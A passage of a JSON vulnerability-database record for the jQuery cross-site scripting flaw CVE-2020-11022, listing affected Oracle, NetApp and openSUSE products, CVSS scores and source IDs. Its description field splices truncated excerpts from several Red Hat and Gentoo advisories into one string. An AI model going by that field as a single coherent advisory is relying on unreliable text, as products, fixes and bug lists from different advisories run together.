"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "agile product supplier collaboration for process",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.0.0"
},
{
"_id": null,
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "hospitality simphony",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1.0"
},
{
"_id": null,
"model": "banking digital experience",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"_id": null,
"model": "communications billing and revenue management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.5.0.23.0"
},
{
"_id": null,
"model": "financial services hedge management and ifrs valuations",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "financial services institutional performance analytics",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"_id": null,
"model": "financial services data integration hub",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.6"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "financial services liquidity risk measurement and management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"_id": null,
"model": "retail customer management and segmentation foundation",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "oncommand system manager",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "3.1.3"
},
{
"_id": null,
"model": "hitachi ops center common services",
"scope": null,
"trust": 0.8,
"vendor": "\u65e5\u7acb",
"version": null
},
{
"_id": null,
"model": "jquery",
"scope": null,
"trust": 0.8,
"vendor": "jquery",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159852"
},
{
"db": "PACKETSTORM",
"id": "171215"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "159876"
},
{
"db": "PACKETSTORM",
"id": "157850"
},
{
"db": "PACKETSTORM",
"id": "159275"
}
],
"trust": 0.6
},
"cve": "CVE-2020-11022",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11022",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-163559",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2020-11022",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"id": "CVE-2020-11022",
"impactScore": 4.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-11022",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2020-11022",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-11022",
"trust": 0.8,
"value": "Medium"
},
{
"author": "VULHUB",
"id": "VHN-163559",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11022",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163559"
},
{
"db": "VULMON",
"id": "CVE-2020-11022"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004854"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
},
{
"db": "NVD",
"id": "CVE-2020-11022"
}
]
},
"description": {
"_id": null,
"data": "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery\u0027s DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. jQuery is an open source, cross-browser JavaScript library developed by American John Resig programmers. The library simplifies the operation between HTML and JavaScript, and has the characteristics of modularization and plug-in extension. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1376706 - restore SerialNumber tag in caManualRenewal xml\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1406505 - KRA ECC installation failed with shared tomcat\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1666907 - CC: Enable AIA OCSP cert checking for entire cert chain\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1695901 - CVE-2019-10179 pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1706521 - CA - SubjectAltNameExtInput does not display text fields to the enrollment page\n1710171 - CVE-2019-10146 pki-core: Reflected XSS in \u0027path length\u0027 constraint field in CA\u0027s Agent page\n1721684 - Rebase pki-servlet-engine to 9.0.30\n1724433 - caTransportCert.cfg contains MD2/MD5withRSA as signingAlgsAllowed. \n1732565 - CVE-2019-10221 pki-core: Reflected XSS in getcookies?url= endpoint in CA\n1732981 - When nuxwdog is enabled pkidaemon status shows instances as stopped. \n1777579 - CVE-2020-1721 pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n1805541 - [RFE] CA Certificate Transparency with Embedded Signed Certificate Time stamp\n1817247 - Upgrade to 10.8.3 breaks PKI Tomcat Server\n1821851 - [RFE] Provide SSLEngine via JSSProvider for use with PKI\n1822246 - JSS - NativeProxy never calls releaseNativeResources - Memory Leak\n1824939 - JSS: add RSA PSS support - RHEL 8.3\n1824948 - add RSA PSS support - RHEL 8.3\n1825998 - CertificatePoliciesExtDefault MAX_NUM_POLICIES hardcoded limit\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1842734 - CVE-2019-10179 pki-core: pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA\u0027s DRM agent page in authorize recovery tab [rhel-8]\n1842736 - CVE-2019-10146 pki-core: Reflected Cross-Site Scripting in \u0027path length\u0027 constraint field in CA\u0027s Agent page [rhel-8]\n1843537 - Able to Perform PKI CLI operations like cert request and approval without nssdb password\n1845447 - pkispawn fails in FIPS mode: AJP connector has secretRequired=\"true\" but no secret\n1850004 - CVE-2020-11023 jquery: Passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854043 - /usr/bin/PrettyPrintCert is failing with a ClassNotFoundException\n1854959 - ca-profile-add with Netscape extensions nsCertSSLClient and nsCertEmail in the profile gets stuck in processing\n1855273 - CVE-2020-15720 pki: Dogtag\u0027s python client does not validate certificates\n1855319 - Not able to launch pkiconsole\n1856368 - kra-key-generate request is failing\n1857933 - CA Installation is failing with ncipher v12.30 HSM\n1861911 - pki cli ca-cert-request-approve hangs over crmf request from client-cert-request\n1869893 - Common certificates are missing in CS.cfg on shared PKI instance\n1871064 - replica install failing during pki-ca component configuration\n1873235 - pki ca-user-cert-add with secure port failed with \u0027SSL_ERROR_INAPPROPRIATE_FALLBACK_ALERT\u0027\n\n6. You can also manage\nuser accounts for web applications, mobile applications, and RESTful web\nservices. Description:\n\nRed Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Description:\n\nRed Hat Identity Management (IdM) is a centralized authentication, identity\nmanagement, and authorization solution for both traditional and cloud-based\nenterprise environments. Bugs fixed (https://bugzilla.redhat.com/):\n\n1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests\n1430365 - [RFE] Host-group names command rename\n1488732 - fake_mname in named.conf is no longer effective\n1585020 - Enable compat tree to provide information about AD users and groups on trust agents\n1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute\n1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip\n1651577 - [WebUI] IPA Error 3007: RequirmentError\" while adding members in \"User ID overrides\" tab\n1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute\n1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property\n1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute\n1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute\n1701233 - [RFE] support setting supported signature methods on the token\n1701972 - CVE-2019-11358 jquery: Prototype pollution in object\u0027s prototype leading to denial of service, remote code execution, or property injection\n1746830 - Memory leak during search of idview overrides\n1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch\n1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming\n1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn\u0027t work in GUI (it works only from CLI)\n1759888 - Rebase OpenDNSSEC to 2.1\n1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED\n1777806 - When Service weight is set as 0 for server in IPA location \"IPA Error 903: InternalError\" is displayed\n1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service\n1801698 - [RFE] Changing default hostgroup is too easy\n1802471 - SELinux policy for ipa-custodia\n1809835 - RFE: ipa group-add-member: number of failed should also be emphasized\n1810154 - RFE: ipa-backup should compare locally and globally installed server roles\n1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time\n1813330 - ipa-restore does not restart httpd\n1816784 - KRA install fails if all KRA members are Hidden Replicas\n1818765 - [Rebase] Rebase ipa to 4.8.6+\n1818877 - [Rebase] Rebase to softhsm 2.6.0+\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831732 - AVC avc: denied { dac_override } for comm=\"ods-enforcerd\n1831935 - AD authentication with IdM against SQL Server\n1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11\n1833266 - [dirsrv] set \u0027nsslapd-enable-upgrade-hash: off\u0027 as this raises warnings\n1834264 - BIND rebase: rebuild against new so version\n1834909 - softhsm use-after-free on process exit\n1845211 - Rebase bind-dyndb-ldap to 11.3\n1845537 - IPA bind configuration issue\n1845596 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts\n1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7\n1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn\n1849914 - FreeIPA - Utilize 256-bit AJP connector passwords\n1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition\n1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2\n1853263 - ipa-selinux package missing\n1857157 - replica install failing with avc denial for custodia component\n1858318 - AttributeError: module \u0027ssl\u0027 has no attribute \u0027SSLCertVerificationError\u0027 when upgrading ca-less ipa master\n1859213 - AVC denial during ipa-adtrust-install --add-agents\n1863079 - ipa-epn command displays \u0027exception: ConnectionRefusedError: [Errno 111] Connection refused\u0027\n1863616 - CA-less install does not set required permissions on KDC certificate\n1866291 - EPN: enhance input validation\n1866938 - ipa-epn fails to retrieve user data if some user attributes are not present\n1868432 - Unhandled Python exception in \u0027/usr/libexec/ipa/ipa-pki-retrieve-key\u0027\n1869311 - ipa trust-add fails with \u0027Fetching domains from trusted forest failed\u0027\n1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less\n1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain\n1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. \n1879604 - pkispawn logs files are empty\n\n6. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202007-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/ \u003chttps://security.gentoo.org/\u003e\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Cacti: Multiple vulnerabilities\n Date: July 26, 2020\n Bugs: #728678, #732522\n ID: 202007-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Cacti, the worst of which\ncould result in the arbitrary execution of code. \n\nBackground\n==========\n\nCacti is a complete frontend to rrdtool. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-analyzer/cacti \u003c 1.2.13 \u003e= 1.2.13\n 2 net-analyzer/cacti-spine\n \u003c 1.2.13 \u003e= 1.2.13\n -------------------------------------------------------------------\n 2 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Cacti. Please review\nthe CVE identifiers referenced below for details. \n\nImpact\n======\n\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-analyzer/cacti-1.2.13\"\n\nAll Cacti Spine users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=net-analyzer/cacti-spine-1.2.13\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-11022\n https://nvd.nist.gov/vuln/detail/CVE-2020-11022 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11022\u003e\n[ 2 ] CVE-2020-11023\n https://nvd.nist.gov/vuln/detail/CVE-2020-11023 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-11023\u003e\n[ 3 ] CVE-2020-14295\n https://nvd.nist.gov/vuln/detail/CVE-2020-14295 \u003chttps://nvd.nist.gov/vuln/detail/CVE-2020-14295\u003e\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202007-03 \u003chttps://security.gentoo.org/glsa/202007-03\u003e\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org \u003cmailto:security@gentoo.org\u003e or alternatively, you may file a bug at\nhttps://bugs.gentoo.org \u003chttps://bugs.gentoo.org/\u003e. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5 \u003chttps://creativecommons.org/licenses/by-sa/2.5\u003e\n\n. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. Solution:\n\nBefore applying this update, ensure all previously released errata relevant\nto your system is applied. \n\nSee the following documentation, which will be updated shortly for release\n3.11.219, for important instructions on how to upgrade your cluster and\nfully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_r\nelease_notes.html\n\nThis update is available via the Red Hat Network. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Virtualization security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:3807-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:3807\nIssue date: 2020-09-23\nCVE Names: CVE-2020-8203 CVE-2020-11022 CVE-2020-11023\n CVE-2020-14333\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Virtualization Engine 4.4. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch\n\n3. Description:\n\nThe org.ovirt.engine-root is a core component of oVirt. \n\nThe following packages have been upgraded to a later upstream version:\nansible-runner-service (1.0.5), org.ovirt.engine-root (4.4.2.3),\novirt-engine-dwh (4.4.2.1), ovirt-engine-extension-aaa-ldap (1.4.1),\novirt-engine-ui-extensions (1.2.3), ovirt-log-collector (4.4.3),\novirt-web-ui (1.6.4), rhvm-branding-rhv (4.4.5), rhvm-dependencies (4.4.1),\nvdsm-jsonrpc-java (1.5.5). (BZ#1674420, BZ#1866734)\n\nA list of bugs fixed in this update is available in the Technical Notes\nbook:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_virtualization/4.4/ht\nml-single/technical_notes\n\nSecurity Fix(es):\n\n* nodejs-lodash: prototype pollution in zipObjectDeep function\n(CVE-2020-8203)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* ovirt-engine: Reflected cross site scripting vulnerability\n(CVE-2020-14333)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* Cannot assign direct LUN from FC storage - grayed out (BZ#1625499)\n\n* VM portal always asks how to open console.vv even it has been set to\ndefault application. (BZ#1638217)\n\n* RESTAPI Not able to remove the QoS from a disk profile (BZ#1643520)\n\n* On OVA import, qemu-img fails to write to NFS storage domain (BZ#1748879)\n\n* Possible missing block path for a SCSI host device needs to be handled in\nthe UI (BZ#1801206)\n\n* Scheduling Memory calculation disregards huge-pages (BZ#1804037)\n\n* Engine does not reduce scheduling memory when a VM with dynamic hugepages\nruns. (BZ#1804046)\n\n* In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n(BZ#1806339)\n\n* Refresh LUN is using host from different Data Center to scan the LUN\n(BZ#1838051)\n\n* Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and\ngreater for RHV-M GUI/Webadmin portal (BZ#1843234)\n\n* [RHV-CNV] - NPE when creating new VM in cnv cluster (BZ#1854488)\n\n* [CNV\u0026RHV] Add-Disk operation failed to complete. (BZ#1855377)\n\n* Cannot create KubeVirt VM as a normal user (BZ#1859460)\n\n* Welcome page - remove Metrics Store links and update \"Insights Guide\"\nlink (BZ#1866466)\n\n* [RHV 4.4] Change in CPU model name after RHVH upgrade (BZ#1869209)\n\n* VM vm-name is down with error. Exit message: unsupported configuration:\nCan\u0027t add USB input device. USB bus is disabled. (BZ#1871235)\n\n* spec_ctrl host feature not detected (BZ#1875609)\n\nEnhancement(s):\n\n* [RFE] API for changed blocks/sectors for a disk for incremental backup\nusage (BZ#1139877)\n\n* [RFE] Improve workflow for storage migration of VMs with multiple disks\n(BZ#1749803)\n\n* [RFE] Move the Remove VM button to the drop down menu when viewing\ndetails such as snapshots (BZ#1763812)\n\n* [RFE] enhance search filter for Storage Domains with free argument\n(BZ#1819260)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1625499 - Cannot assign direct LUN from FC storage - grayed out\n1638217 - VM portal always asks how to open console.vv even it has been set to default application. \n1643520 - RESTAPI Not able to remove the QoS from a disk profile\n1674420 - [RFE] - add support for Cascadelake-Server CPUs (and IvyBridge)\n1748879 - On OVA import, qemu-img fails to write to NFS storage domain\n1749803 - [RFE] Improve workflow for storage migration of VMs with multiple disks\n1758024 - Long running Ansible tasks timeout and abort for RHV-H hosts with STIG/Security Profiles applied\n1763812 - [RFE] Move the Remove VM button to the drop down menu when viewing details such as snapshots\n1778471 - Using more than one asterisk in LDAP search string is not working when searching for AD users. \n1787854 - RHV: Updating/reinstall a host which is part of affinity labels is removed from the affinity label. \n1801206 - Possible missing block path for a SCSI host device needs to be handled in the UI\n1803856 - [Scale] ovirt-vmconsole takes too long or times out in a 500+ VM environment. \n1804037 - Scheduling Memory calculation disregards huge-pages\n1804046 - Engine does not reduce scheduling memory when a VM with dynamic hugepages runs. \n1806339 - In Admin Portal, \"Huge Pages (size: amount)\" needs to be clarified\n1816951 - [CNV\u0026RHV] CNV VM migration failure is not handled correctly by the engine\n1819260 - [RFE] enhance search filter for Storage Domains with free argument\n1826255 - [CNV\u0026RHV]Change name of type of provider - CNV -\u003e OpenShift Virtualization\n1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method\n1831949 - RESTAPI javadoc contains missing information about assigning IP address to NIC\n1831952 - RESTAPI contains malformed link around JSON representation fo the cluster\n1831954 - RESTAPI javadoc contains malformed link around oVirt guest agent\n1831956 - RESTAPI javadoc contains malformed link around time zone representation\n1838051 - Refresh LUN is using host from different Data Center to scan the LUN\n1841112 - not able to upload vm from OVA when there are 2 OVA from the same vm in same directory\n1843234 - Unable to create Windows VM\u0027s with Mozilla Firefox version 74.0.1 and greater for RHV-M GUI/Webadmin portal\n1850004 - CVE-2020-11023 jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1854488 - [RHV-CNV] - NPE when creating new VM in cnv cluster\n1855377 - [CNV\u0026RHV] Add-Disk operation failed to complete. \n1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function\n1858184 - CVE-2020-14333 ovirt-engine: Reflected cross site scripting vulnerability\n1859460 - Cannot create KubeVirt VM as a normal user\n1860907 - Upgrade bundled GWT to 2.9.0\n1866466 - Welcome page - remove Metrics Store links and update \"Insights Guide\" link\n1866734 - [DWH] Rebase bug - for the 4.4.2 release\n1869209 - [RHV 4.4] Change in CPU model name after RHVH upgrade\n1869302 - ansible 2.9.12 - host deploy fixes\n1871235 - VM vm-name is down with error. Exit message: unsupported configuration: Can\u0027t add USB input device. USB bus is disabled. \n1875609 - spec_ctrl host feature not detected\n1875851 - Web Admin interface broken on Firefox ESR 68.11\n\n6. Package List:\n\nRHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:\n\nSource:\nansible-runner-service-1.0.5-1.el8ev.src.rpm\novirt-engine-4.4.2.3-0.6.el8ev.src.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.src.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.src.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.src.rpm\novirt-log-collector-4.4.3-1.el8ev.src.rpm\novirt-web-ui-1.6.4-1.el8ev.src.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.src.rpm\nrhvm-dependencies-4.4.1-1.el8ev.src.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.src.rpm\n\nnoarch:\nansible-runner-service-1.0.5-1.el8ev.noarch.rpm\novirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-backend-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dbscripts-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-dwh-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-grafana-integration-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-dwh-setup-4.4.2.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-1.4.1-1.el8ev.noarch.rpm\novirt-engine-extension-aaa-ldap-setup-1.4.1-1.el8ev.noarch.rpm\novirt-engine-health-check-bundler-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-restapi-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-base-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-cinderlib-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-imageio-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-ovirt-engine-common-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-setup-plugin-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-tools-backup-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-ui-extensions-1.2.3-1.el8ev.noarch.rpm\novirt-engine-vmconsole-proxy-helper-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-webadmin-portal-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-engine-websocket-proxy-4.4.2.3-0.6.el8ev.noarch.rpm\novirt-log-collector-4.4.3-1.el8ev.noarch.rpm\novirt-web-ui-1.6.4-1.el8ev.noarch.rpm\npython3-ovirt-engine-lib-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-4.4.2.3-0.6.el8ev.noarch.rpm\nrhvm-branding-rhv-4.4.5-1.el8ev.noarch.rpm\nrhvm-dependencies-4.4.1-1.el8ev.noarch.rpm\nvdsm-jsonrpc-java-1.5.5-1.el8ev.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-8203\nhttps://access.redhat.com/security/cve/CVE-2020-11022\nhttps://access.redhat.com/security/cve/CVE-2020-11023\nhttps://access.redhat.com/security/cve/CVE-2020-14333\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 